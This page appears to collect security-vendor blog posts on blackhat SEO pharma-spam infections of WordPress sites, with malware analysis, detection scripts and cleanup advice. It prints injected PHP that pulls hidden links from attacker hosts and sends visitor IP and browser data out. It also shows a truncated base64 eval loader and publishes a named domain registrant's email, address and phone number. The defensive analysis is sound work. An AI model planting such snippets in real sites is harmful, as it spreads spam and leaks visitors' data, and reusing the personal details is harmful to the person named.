Wpstats.org Spam and a Fake Advanced Search Plugin

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if (function_exists('curl_init')) {
        // Fetch the remote "script", which is really a block of hidden spam links
        $url = "http://www.wpstats.org/jquery-1.6.3.min.js";
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it directly
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        $data = curl_exec($ch);
        curl_close($ch);
        echo "$data"; // write the fetched links into the theme header
}

If you are not familiar with PHP, this code will contact www.wpstats.org/jquery-1.6.3.min.js, which will return a long list of hidden links to be included on your site (not visible on a normal browser).

Website Cross-contamination: Blackhat SEO Spam Malware

We recently posted about Website Cross-Contamination which we see quite a bit of in shared hosting environments. This post is a follow up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push their campaign.

We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:

Intelligent (Pharma) Spam Decoded

We are seeing a rise in the use of intelligent SPAM – a.k.a. Pharma Hack – across a number of platforms. We recently found a nice injection that made us salivate; we figured you’d be just as interested.

It is of no surprise to us that attackers are always looking for ways to trick us and more importantly our users. This gem of a find was no different.

SPAM = “Stupid, Pointless Annoying Message”.

SPAM, in the form of unsolicited e-mail messages, is a problem that we face every day. Imagine sending a client a link to a newly released product, they get to the page, and BAM they’re greeted with advertisements for pharmaceutical products (Viagra / Cialis / Male Enhancers). What do you think the impact would be?

DreamHost Security Issue Prompts FTP Password Resets

Yesterday on the DreamHost Status Blog, it was announced that all shell/FTP passwords would be reset due to what looks to be a security breach that was discovered on one of the DreamHost database servers.

DreamHost looks to have done a great job notifying affected customers via the update page, keeping them up-to-date throughout the day until the issue was resolved. It looks like all FTP passwords were indeed reset.

We recommend that all DreamHost customers log in to their accounts and check their account status. It is encouraged that you change your account passwords, and it wouldn’t hurt to change your FTP and database passwords again just to make sure.

Funny Spammers: Any Reproduction of This Document in Part or in Whole is Strictly Prohibited

Spam is nothing new, but a recent site we were reviewing was a bit different. After a bit of analysis, we found a file called tracks.php that was generating spam with the following code on it:

<?php // Any reproduction of this document in part or in whole is strictly prohibited. For educational purposes only. 1993-2011 (c)
error_reporting(0) ;eval ( base64_decode("JGxMOXdGMWFZNHpYNmpUMWdUNmdRN2xPMG..


Mass Spam Infection From Wplinksforwork Dot Com (50k+ WordPress Sites Hacked)

Last year we spoke about the siteurlpath blackhat SEO attack that was infecting many WordPress sites with spam.

But, how many? We had no clue at the time. Today, we decided to check on Google and it seems that almost 50k (yes, fifty thousand sites) were compromised, at minimum…

How do we know this? Well, the attack consists of contacting the domain wplinksforwork.com to get a list of links to be displayed on the compromised sites. However, that domain has been down for the last few days and all the sites compromised (if they have display errors enabled), have this message in their footer:

Warning: file_get_contents(http://wplinksforwork.com/56132.. 47509328/p.php?host=… failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in ..


Mass Compromise of Sites at gogvo.com – SEO Spam

A regular topic of discussion the past few months has been the basicpills link injection (a type of blackhat seo spam) on WordPress sites.

If you are not familiar with it, thousands of sites have been infected with basicpills, which injects a ton of spammy pharma links all over the compromised site (it infiltrates WordPress and attacks the wp_posts table).

So what’s that have to do with gogvo.com getting compromised? Well, in the past, the attackers would inject links directing to 247pharmaceutical.com or amoxilpharm.com, sometimes something else but similar. They seem to have changed tactics; now they are injecting links to an image directory, like:

Host4africa Mass Compromise

We are seeing a lot of sites hosted at host4africa.com compromised with Blackhat Spam SEO. Most of them are in the .co.za TLD (at 74.53.0.0/16 and 74.54.0.0/16) and have hidden links to generic drugs (common Pharma Spam).

When you click on the links added to the compromised sites you are redirected to a Pharma page, like this one:

The number of sites compromised is pretty large. Here are some we identified on one site:

Python: No such file or directory – Your site is likely compromised

If you run a WordPress site and you are seeing the following error at the top of your pages:

sh:  /usr/local/bin/python: No such file or directory

It means that it is likely compromised. How do we know that? We were tracking a large blackhat SEO spam campaign (targeting WordPress sites) and we noticed that for the last few days one of their link distribution domains was broken and generating an error. So any hacked site would display that error instead of showing the spammy links.

This is the code that caused it (added to the index.php of the hacked sites):

<?php
        // Build a request to the attacker's server carrying the visitor's IP, browser and referer
        $url = "http://apollos.com.tw/LHRS/12/request.php?ip=".$_SERVER['REMOTE_ADDR']."&useragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."&referer=".urlencode($_SERVER["HTTP_REFERER"]);
        // Fetch whatever that server answers with (the list of links to display)
        $answer = file_get_contents($url);
        // Print the answer unless it contains the "noredirect" marker
        if (strpos($answer,"noredirect") === false) {
                echo $answer;
        }
?>

As you can see, it attempts to connect to apollos.com.tw to get the list of links to display. However, if you access this domain now you will get a python error instead…
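Both the wpstats.org theme-header snippet and the apollos.com.tw index.php snippet above share one shape: PHP fetches a hard-coded remote URL and echoes the result into the page. The following heuristic scanner, an added example written for this page rather than code from Sucuri or from the injections, flags that shape in PHP source; the three samples are constructed and the function name is our own.

```python
import re

# Constructed samples (not taken from a live site): the two injection patterns
# the posts describe, shortened to one statement per step, plus a benign theme
# snippet that reads a local file and echoes an ordinary link.
SAMPLE_CURL = ('if(function_exists(\'curl_init\')) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; '
               '$ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); '
               'curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $data = curl_exec($ch); curl_close($ch); echo "$data"; }')
SAMPLE_FGC = ('$url = "http://apollos.com.tw/LHRS/12/request.php?ip=".$_SERVER[\'REMOTE_ADDR\']; '
              '$answer = file_get_contents($url); if (strpos($answer,"noredirect") === false) { echo $answer; }')
SAMPLE_BENIGN = ('$css = file_get_contents(__DIR__ . "/style.css"); echo $css; '
                 '$home = "http://example.com/"; echo "<a href=\'$home\'>home</a>";')

URL_LITERAL = re.compile(r'["\'](https?://[^"\']+)', re.I)
ASSIGN = re.compile(r'(\$\w+)\s*=\s*["\'](https?://[^"\']+)', re.I)
FETCH = re.compile(r'\b(curl_setopt|file_get_contents|fopen|fsockopen)\s*\(([^;]*)', re.I)
OUTPUT = re.compile(r'\b(echo|print)\b', re.I)


def find_remote_fetch_injections(php):
    """Return the sorted remote URLs that a PHP snippet fetches and then echoes.

    Heuristic: a statement counts as a fetch when curl_setopt/file_get_contents/
    fopen/fsockopen receives an http(s) literal or a variable that was earlier
    assigned one, and the snippet also calls echo/print somewhere. That is the
    shape of both the wpstats.org and the apollos.com.tw injections.
    """
    if not OUTPUT.search(php):
        return []  # fetched data is never printed, so no link injection
    url_vars = dict(ASSIGN.findall(php))  # {'$url': 'http://...'}
    found = set()
    for stmt in php.split(';'):
        for call in FETCH.finditer(stmt):
            args = call.group(2)
            literal = URL_LITERAL.search(args)
            if literal:
                found.add(literal.group(1))
                continue
            for var in re.findall(r'\$\w+', args):
                if var in url_vars:
                    found.add(url_vars[var])
    return sorted(found)
```

Run it over every .php file in wp-content/themes and the site root; a theme that legitimately fetches a remote URL and prints it will also be flagged, so treat hits as a review list rather than a verdict.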

These are some other domains being used in this spam campaign:

apollos.com.tw
coolbloglinks.com
iqitiq.com
readerspot.com
tsarstvonebesnoe.ru
wat.az

If you are unsure if your site is compromised, try doing a quick scan here: http://sitecheck.sucuri.net

Links Injection on WordPress – Blackhat SEO Spam (basicpills) update

For the last few months we’ve been tracking a very large blackhat SEO spam campaign initiated by basicpills.com, and many other pharma-related domains (mostly located at 212.117.161.190 and 212.117.168.214).

The method used is very simple, where the attackers inject a single spam link on every post of the web site (generally WordPress). These are some of the links you will see in an infected site:

<a href="http://247pharmaceutical. com/">online prescription drugs without  a prescription..

<a href="http://webemed. com/">Buy  Generic  Cialis Onlin.

<a href="http://getrxpills . com/buy/levi tra.html”>lev itra 10 mg..

The really annoying part is that the domain and anchor text change on every post, making it very hard to delete and detect. These are some of the domains being used:


Some of these domains are being registered through Godaddy by:

Administrative Contact:
York, Steve york71steve@yahoo.com
6041 Pierless Ave
Sugar Hill, GA 30518
United States
7709450281 Fax —

And we would love to get them disabled.

For the site owners out there, you can check if your site has been infected by scanning it with our malware and spam scanner. It will show if these links have been added, and if you have other security issues. If your site has been hacked, we recommend changing your DB passwords immediately, and checking the permissions of your wp-config.php file.
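The injection described above (one external pharma link per post, with a different domain and anchor text each time) can be checked for directly in the post_content column of wp_posts. The scanner below is an added example, not Sucuri's scanner and not code from the campaign; the post rows, site hostname and short spam-host set are constructed, and KNOWN_SPAM_HOSTS would be filled from the domain list in this post.

```python
import re
from urllib.parse import urlparse

# Constructed wp_posts rows (post_id -> post_content), not real site data; the
# injected anchors copy the shape the post describes: one link per post, with
# a different domain and anchor text each time, sometimes hidden with CSS.
SITE_HOST = "example.com"
POSTS = {
    1: '<p>Release notes.</p><a href="http://247pharmaceutical.com/">online prescription drugs</a>',
    2: '<p>See <a href="https://wordpress.org/">WordPress</a>.</p>',
    3: '<p>Hi.</p><a href="http://getrxpills.com/buy/levitra.html" style="display:none">levitra 10 mg</a>',
    4: '<p>Internal <a href="http://example.com/about/">about</a> link.</p>',
}
# A few hosts from the list in the post; extend with the full list.
KNOWN_SPAM_HOSTS = {"247pharmaceutical.com", "webemed.com", "getrxpills.com", "basicpills.com"}
PHARMA_TERMS = re.compile(r"viagra|cialis|levitra|pharm|pills|acomplia|kamagra", re.I)
ANCHOR = re.compile(r"<a\b([^>]*)>(.*?)</a>", re.I | re.S)
HREF = re.compile(r"""href\s*=\s*["']([^"']+)""", re.I)
HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def find_injected_links(posts, site_host, spam_hosts):
    """Return {post_id: [(href, reasons)]} for external anchors that point at a
    known spam host, carry pharma wording in host or text, or are CSS-hidden.
    Anchors are matched with a regex, which is enough for post bodies pulled
    from wp_posts; use a real HTML parser for arbitrary markup."""
    hits = {}
    for pid, html in posts.items():
        for attrs, text in ANCHOR.findall(html):
            m = HREF.search(attrs)
            if not m:
                continue
            href = m.group(1)
            host = (urlparse(href).hostname or "").lower()
            host = host[4:] if host.startswith("www.") else host
            if not host or host == site_host:
                continue  # relative or same-site link: not an injection candidate
            reasons = []
            if host in spam_hosts:
                reasons.append("known spam host")
            if PHARMA_TERMS.search(host) or PHARMA_TERMS.search(text):
                reasons.append("pharma wording")
            if HIDDEN.search(attrs):
                reasons.append("hidden anchor")
            if reasons:
                hits.setdefault(pid, []).append((href, ", ".join(reasons)))
    return hits
```

Feed it the rows from SELECT ID, post_content FROM wp_posts and clean the flagged posts by hand; the hidden-anchor and pharma-wording checks catch the domains that rotate off the known list.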

If you need help cleaning up the mess, send us an email at support@sucuri.net, or visit us over at Sucuri.

If you have any questions or comments, please let us know.